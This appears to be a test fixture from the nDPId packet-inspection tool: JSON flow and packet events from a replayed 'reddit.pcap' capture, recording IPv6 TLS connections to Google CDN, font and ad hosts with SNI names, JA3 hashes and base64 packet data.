+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9311,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgRAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuVFgHH2llkCsoHoBJXgJ6iAAACBAV4AQMDAwQCCArC10u9qlQMrQ=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9312,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygcBx9pagBAB+yKXAAABAQgKqlQMysLXS70="} +00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9315,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZEy\/C8or4r7coBJXgC2BAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9316,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZgWfUkJjbNefoBJXgN3ZAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9317,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtxMvwvLgBAB+7F0AAABAQgKuJU7UsLXS74="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns158Fn1JDgBAB+2HNAAABAQgKuJU7UsLXS74="} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9321,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQan0Owi4YaAsmoBJXgA33AAACBAV4AQMDAwQCCArC10u\/uJU7NA=="} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9322,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQaPhCx3meEC1CoBJXgOW1AAACBAV4AQMDAwQCCArC10u+uJU7NA=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9323,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyZ9DsIvgBAB+5HpAAABAQgKuJU7U8LXS78="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9324,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUL4Qsd6gBAB+2moAAABAQgKuJU7U8LXS74="} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690992,"flow_last_seen":1605291690992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690992,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1605291690992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690992,"pkt":"qtsDr8lk5EKm5WPyht1gDPazACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGcAAAAAoAL9IIFCAAACBAWgBAIICriVO3YAAAAAAQMDBw=="} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9406,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690999,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691002,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9434,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9436,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691003,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291691004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291691004,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9475,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1605291691029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291691029,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQbO1037mLrsxooBJXgErvAAACBAV4AQMDAwQCCArC10wIuJU7dg=="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9476,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1605291691029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":74,"pkt_l4_len":20,"thread_ts_msec":1605291691029,"pkt":"qtsDr8lk5EKm5WPyht1gBfK\/ABQGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGgAAAAAUAQAANo6AAA="} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291696948,"flow_last_seen":1605291696948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291696948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11226,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1605291696948,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696948,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBQAAAAAoAL9IL45AAACBAWgBAIIClIhuaMAAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11227,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1605291696965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291696965,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADTTrOwqAcsBIEmLB5kd7IUo3\/YpAbu3nh9OKxV4xygVoBJXgPOCAAACBAV4AQMDAwQCCArC12M3UiG5ow=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11228,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1605291696965,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291696965,"pkt":"qtsDr8lk5EKm5WPyht1gDNdJACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA006zst54Bu3jHKBUfTisWgBAB+3eDAAABAQgKUiG5tMLXYzc="} 